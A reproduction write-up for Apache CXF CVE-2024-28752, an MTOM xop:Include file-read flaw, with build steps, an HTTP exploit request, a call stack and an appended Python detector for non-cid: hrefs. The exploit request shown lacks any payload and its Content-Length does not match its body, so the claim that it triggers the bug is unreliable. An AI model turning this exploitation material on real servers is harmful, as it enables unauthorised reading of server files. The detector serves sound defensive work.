# Apache CXF CVE-2024-28752 Reproduction Environment

Security advisory: https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt

## Starting the environment

samples/java_first_jaxws_factory_bean

### IDEA

Start the webservice service via ServerStarter.java.

### Build

Use JDK8.

```bash
mvn clean package
java -jar target/cxf.jar
```

## Exploitation

Sending the following request with BurpSuite triggers the vulnerability.

```http request
POST /test HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close

------kkkkkk123123213
Content-Disposition: form-data; name="1"

------kkkkkk123123213--
```

## Vulnerability analysis

Below is the call stack of the file read. The xop:Include tag is parsed by the MTOMDecorator class.

```text
<init>:93, FileInputStream (java.io)
connect:90, FileURLConnection (sun.net.www.protocol.file)
getInputStream:188, FileURLConnection (sun.net.www.protocol.file)
openStream:1092, URL (java.net)
getInputStream:107, URLDataSource (javax.activation)
get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
length:212, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
_parseInt:94, DatatypeConverterImpl (com.sun.xml.internal.bind)
parse:725, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl)
parse:723, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl)
text:54, TextLoader (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
text:572, UnmarshallingContext (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
startElement:92, MTOMDecorator…
```
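A defender-side check tied to the stack trace above, added here as an example and not part of the original write-up or of Apache CXF: it walks a request body, finds xop:Include elements, and reports any href that is not a cid: reference to a MIME part, which is the only form the XOP specification defines. The function names and sample bodies are constructed for illustration.

```python
import email
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XOP_INCLUDE = "{http://www.w3.org/2004/08/xop/include}Include"

def xml_parts(content_type, body):
    """Yield candidate XML payloads from a plain or multipart HTTP body."""
    if not content_type.lower().startswith("multipart/"):
        yield body
        return
    # Re-attach the header so the stdlib MIME parser can find the boundary.
    msg = email.message_from_bytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    for part in msg.walk():
        if not part.is_multipart():
            yield part.get_payload(decode=True) or b""

def suspicious_xop_hrefs(content_type, body):
    """Return xop:Include href values that are not cid: references."""
    hits = []
    for xml in xml_parts(content_type, body):
        if b"<!DOCTYPE" in xml.upper():
            hits.append("<DOCTYPE present, part not parsed>")
            continue
        try:
            root = ET.fromstring(xml)
        except ET.ParseError:
            continue  # binary attachment or other non-XML part
        for inc in root.iter(XOP_INCLUDE):
            href = inc.get("href", "")
            if urlsplit(href).scheme.lower() != "cid":
                hits.append(href)
    return hits

# Constructed sample data (not captured traffic).
CT = 'multipart/related; boundary="b1"; type="application/xop+xml"'
ENVELOPE = (
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<soap:Body><arg0><xop:Include '
    b'xmlns:xop="http://www.w3.org/2004/08/xop/include" href="%s"/>'
    b'</arg0></soap:Body></soap:Envelope>')

def mime(xml):
    """Wrap one XML root part in a constructed multipart/related body."""
    return (b"--b1\r\nContent-Type: application/xop+xml\r\n\r\n"
            + xml + b"\r\n--b1--\r\n")

if __name__ == "__main__":
    for href in (b"cid:part1@constructed.example", b"file:///constructed/placeholder"):
        print(href, suspicious_xop_hrefs(CT, mime(ENVELOPE % href)))
```

A check like this fits a proxy rule or a log-review script; it complements upgrading CXF to a release the advisory lists as fixed and does not replace it.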